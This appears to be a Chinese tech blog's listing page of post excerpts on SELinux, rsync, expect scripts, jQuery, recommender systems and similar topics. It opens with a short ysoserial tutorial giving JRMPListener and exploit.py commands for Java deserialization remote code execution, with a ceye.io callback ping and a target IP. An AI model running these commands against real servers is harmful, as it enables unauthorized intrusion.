天道酬勤,学无止境

介绍

反序列化工具ysoserial使用介绍

反序列化工具ysoserial使用介绍 0x00 ysoserial是什么? ysoserial集合了各种java反序列化payload;下载地址:https://github.com/angelwhu/ysoserial 0x01 基本使用方法 在公网vps上执行: java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 【port】 CommonsCollections1 '【commands】' port:公网vps上监听的端口号commands:需要执行的命令例子: java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'ping -c 2 rce.267hqw.ceye.io' 重启一个shell窗口: python exploit.py 【目标ip】 【目标端口】 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 【JRMPListener ip】 【JRMPListener port】 JRMPClient 列子: python exploit.py 118.89.53.139 7001

2021-11-22 17:57:24    分类:博客    ysoserial   使用   介绍   工具

SELinux介绍与设置

一、SELinux介绍   selinux强制访问控制的一种策略,在传统的linux系统中,一切皆文件,有用户,组和权限来控制访问,在selinux中,一切皆对象,由存放在扩展属性域的安全元素控制访问,所有文件、端口、进程都具备安全上下文,安全上下文主要分为五个安全元素user、role、type、sensitivity、category。 二、五个安全元素 user:登录系统的用户类型,如root,user_u,system_u,所属本地进程都属于自由(unconfined)进程role:定义文件,进程和用户的用途:文件:object_r,进程和用户:system_rtype:数据类型,在规则中,何种进程类型访问何种文件都是基于type来实现的,多服务公用的类型有public_content_tsensitivity:限制访问的需要由组织定义的分层category:对于规定组织划分不分层的分类 三、selinux工作模式   selinux主要模式有:strict(centos5)、targeted、minimun(centos7)、mls几类,selinux系统默认选择是targeten,strict已经不再使用,minimun和mls稳定性不足 四、实际上下文和期望上下文 实际上下文:存放在元数据中,查看文件上下文:ls -Z。查看进程上下文:ps -Z期望上下文

2021-06-01 23:40:03    分类:博客    SELinux   介绍   设置

ortp库使用入门

我们知道, RTP(Real-timeTransportProtocol)是用于Internet上针对多媒体数据流的一种传输协议,做流媒体传输方面的应用离不开RTP协议的实现及使用,为了更加快速地在项目中应用RTP协议实现流媒体的传输,我们一般会选择使用一些RTP库,例如使用c++语言编写的JRTPLIB库,网上关于RTP协议以及JRTPLIB库的介绍已经很多了,在此我也不再赘述,文本主要介绍实现了RTP协议的另一种开源库——ORTP库,这个库是纯使用c语言编写,由于我们的项目是基于Linux下的c语言编程,故我们选择了ortp作为我们的第三方库,在此我也对该库进行一个简单地介绍,希望对其他ortp的初学者有所帮助。一、简介ORTP是一个支持RTP以及RFC3550协议的库,有如下的特性:(1)使用C语言编写,可以工作于windows, Linux, 以及 Unix平台(2)实现了RFC3550协议,提供简单易用的API。支持多种配置,RFC3551为默认的配置。(3)支持单线程下的多个RTP会话,支持自适应抖动处理。(4)基于GPL版权声明。ORTP可以在其官方网站上(http://www.linphone.org/index.php/eng/code_review/ortp)下载,下载解压后得到ORTP的源码包和示例程序(tests)。其帮助文档在docs目录下

2021-05-19 07:59:30    分类:博客    示例   rtp   介绍   音视频/多媒体开发

ehcache 3.* 使用介绍

官网地址:http://×××w.ehcache.org/documentation/3.6/getting-started.html 根据官网的说明使用起来非常简单,尤其是在3.0之后, 不管事xml配置文件还是链式编码配置。先看示例:ResourcePoolsBuilder resourcePoolsBuilder = ResourcePoolsBuilder.newResourcePoolsBuilder().heap(20, MemoryUnit.MB).offheap(30, MemoryUnit.MB); CacheConfiguration<String, Object> cacheConfiguration = CacheConfigurationBuilder.newCacheConfigurationBuilder(String.class, Object.class, resourcePoolsBuilder) .withValueSerializer(new PlainJavaSerializer<>(this.getClass().getClassLoader())) .withExpiry(ExpiryPolicyBuilder.timeToIdleExpiration(Duration.ofHours(24))).build(); org

2021-05-12 12:26:32    分类:博客    ehcache   使用   介绍   其他

十(7)rsync:介绍、常用选项、通过ssh同步、通过服务同步、linux系统日志、screen

rsync工具介绍rsync:数据备份工具(remote sync)。rsync不仅可以远程同步数据(类似scp),而且可以本地同步数据(类似cp),但是不同于cp或scp的一点是,如果数据存在的话它不会覆盖以前的数据,而是会先判断已存在的数据是否和新的数据有差异,只有数据不同时才会把不同的部分覆盖。 (系统如果没有rsync命令,安装:yum install -y rsync)(如:有两台机器A、B,要把A的数据每小时都备份到B下,而且A的文件世事刻刻都在更新,如果我们每小时在备份的时候使用的是 cp 操作,则每次都是把B上的文件都覆盖一次,这样我们耗费的时间就很久(如果内容很大)。但是使用rsync则会把A和B之间数据不同的部分进行覆盖,这样耗费的时间就会断,耗费带宽也会小)1.使用rsync 对本地文件进行操作:rsync -av /etc/passwd /tmp/1.txt (把/etc/passwd 同步到/tmp下,命名为1.txt)2.使用rsync远程同步 (进行远程同步必须远程机器和本地机器都得安装有rsync工具)格式:rsync [选项] 备份文件数据 [user@]ip: 目标地址([user@]可以省略 ,表示拷贝到user这个用户下。“:”后面跟路径)rsync -av /tmp/1.txt root@192.168.136.134:/tmp/2

2021-05-12 08:42:12    分类:博客    rsync   介绍

我来了

Cisco认证架构师(CCA) 多年以来,CCIE(Cisco认证互联网专家)认证一直是网络职业人士梦寐以求的最高级别认证,目前全球获得该认证殊荣的人也很少。不过,现在这种情况出现了变化。Cisco在周一又发布了一种比CCIE级别更高的新认证--Cisco认证架构师(CCA)。Cisco试图通过CCA认证将CCIE的网络工程技能与MBA的商业才干结合起来。 在Cisco的CCA认证中,CCA将训练报考者与首席商务运营主管们一起工作,以将商业需求转换成有效的IT系统。 Cisco发言人Fred Wieller表示:“我们的研究显示,如果一家公司购买了错误的技术和服务,那么他们可能会浪费1000亿美元。”产生这种浪费的原因是主管人员对商业需求有着深刻的认识,但是对IT架构缺乏认识,或者是对IT架构有着深刻的认识,但是对商业需求缺乏认识。CCA将训练CCIE如何沟通以上两个群体。 Cisco新公布的CCA认证不仅花费昂贵,而且也极不容易通过。CCA认证需要花费15000美元。报考者不仅必须拥有一个CCIE或CCDE(Cisco认证设计专家)认证,并且需要有至少10年的相关行业的工作经验。报考者必须提出申请,然而再经过Cisco的严格筛选才能参加培训。一旦被允许参加培训课程,报考者必须为一系列商业需求提出一个架构解决方案。届时,考试委员会将会对培训者进行质询,培训者则需要对方案进行答辩

2021-03-27 13:40:28    分类:博客    职场   休闲   介绍

分发系统介绍、expect脚本远程登录、登录执行命令后退出、脚本传递参数

分发系统介绍shell项目-分发系统-expect (expect也是一种脚本语言)使用expect 可以实现文件传输和远程登录 二、expect脚本远程登录1. 安装expect:yum install -y expect2.编写expect脚本:vim /usr/local/sbin/1.expect 内容: #! /usr/bin/expectset host "192.168.136.134" //设置变量hostset passwd "123456" //设置变量passwdspawn ssh root@$hostexpect { "yes/no" { send "yes\r"; exp_continue} //一般我们在远程登陆一台机器的时候会在输入密码的 时候提示“yes/no“关键字再输入yes后才可以输入密码。这里首先是截取”“yes/no”关键字然后执行send“yes\r”(\r表示回程)"assword:" { send "$passwd\r" }}interact(interact:表示登录远程机器后保留在登录的机器。如果不加这个interact,则登录后立马退出。或者使用 expect eof 这个命令,则会在登录机器后的2-3s后退出)3.修改脚本权限:chmod a+x one.expect执行命令: ./one.expect 注意

2021-03-27 08:20:28    分类:博客    expect   系统   介绍

介绍JQuery的基础常用方法$()

介绍JQuery的基础常用方法$() 1. has()包含的意思举例:第一个div包含了span,第二个没有包含<div id="div1"><span>1</span></br> </div><div>111 </div> 执行代码发现 包含span的div的css样式改变了,这就是包含 2.filter()过滤,括号内有参数,可以看例子理解<div id="div1">111</div><div id="div2">111</div>说是过滤,也就是选中的意思吧下面结果看出,除了ID为div1的div,我都给过滤掉了,只给我选中的div,它的css样式会改变 3.not()跟filter相反<div id="div1">111</div><div id="div2">111</div>把filter换成not会发现跟filter的结果相反 4.next()找出同级别下的下一个元素,看例子理解现在写个DIV 级别相同<div id="div1">111</div><div id="div2">222</div><div id="div3">333</div>选中ID为DIV2的div,然后它的下一个同级别元素就是ID为DIV3的div结果 5.prev()跟next相反,是找出同级别下的上一个元素<div id="div1">111</div><div id="div2">222

2021-03-27 07:03:07    分类:博客    介绍   jquery   基础    HTML5+CSS3

推荐系统入门介绍

转载自:https://mp.weixin.qq.com/s/d6bCGT8B4h5pfI77TvLicA这篇文章属于推荐系统的入门篇,本文暂不考虑线上环境的海量数据,目的是先了解清楚推荐系统的基本构成,我会通过图解推荐算法以及程序demo的形式展开,内容包括:01 走进推荐系统的世界“啤酒与尿布” 的故事相信很多人都听过,年轻爸爸去超市购买尿布时,经常会买点啤酒犒劳自己。因此,沃尔玛将这两种商品进行了捆绑销售,最终获得了更好的销量。“啤酒与尿布”的故事这个故事背后的理论依据就是 “推荐算法”,因为尿布和啤酒经常出现在同一个购物车中,那么向购买尿布的年轻爸爸推荐啤酒确实有一定道理。1. 推荐系统到底解决的是什么问题?推荐系统从20世纪90年代就被提出来了,但是真正进入大众视野以及在各大互联网公司中流行起来,还是最近几年的事情。随着移动互联网的发展,越来越多的信息开始在互联网上传播,产生了严重的信息过载。因此,如何从众多信息中找到用户感兴趣的信息,这个便是推荐系统的价值。精准推荐解决了用户痛点,提升了用户体验,最终便能留住用户。推荐系统本质上就是一个信息过滤系统,通常分为:召回、排序、重排序这3个环节,每个环节逐层过滤,最终从海量的物料库中筛选出几十个用户可能感兴趣的物品推荐给用户。推荐系统的分阶段过滤流程2. 推荐系统的应用场景哪里有海量信息,哪里就有推荐系统

2021-03-27 01:28:35    分类:博客    推荐   架构   介绍   服务搭建

推荐系统入门介绍

转载自:https://mp.weixin.qq.com/s/d6bCGT8B4h5pfI77TvLicA这篇文章属于推荐系统的入门篇,本文暂不考虑线上环境的海量数据,目的是先了解清楚推荐系统的基本构成,我会通过图解推荐算法以及程序demo的形式展开,内容包括:01 走进推荐系统的世界“啤酒与尿布” 的故事相信很多人都听过,年轻爸爸去超市购买尿布时,经常会买点啤酒犒劳自己。因此,沃尔玛将这两种商品进行了捆绑销售,最终获得了更好的销量。“啤酒与尿布”的故事这个故事背后的理论依据就是 “推荐算法”,因为尿布和啤酒经常出现在同一个购物车中,那么向购买尿布的年轻爸爸推荐啤酒确实有一定道理。1. 推荐系统到底解决的是什么问题?推荐系统从20世纪90年代就被提出来了,但是真正进入大众视野以及在各大互联网公司中流行起来,还是最近几年的事情。随着移动互联网的发展,越来越多的信息开始在互联网上传播,产生了严重的信息过载。因此,如何从众多信息中找到用户感兴趣的信息,这个便是推荐系统的价值。精准推荐解决了用户痛点,提升了用户体验,最终便能留住用户。推荐系统本质上就是一个信息过滤系统,通常分为:召回、排序、重排序这3个环节,每个环节逐层过滤,最终从海量的物料库中筛选出几十个用户可能感兴趣的物品推荐给用户。推荐系统的分阶段过滤流程2. 推荐系统的应用场景哪里有海量信息,哪里就有推荐系统

2021-03-27 01:28:31    分类:博客    推荐   架构   介绍   服务搭建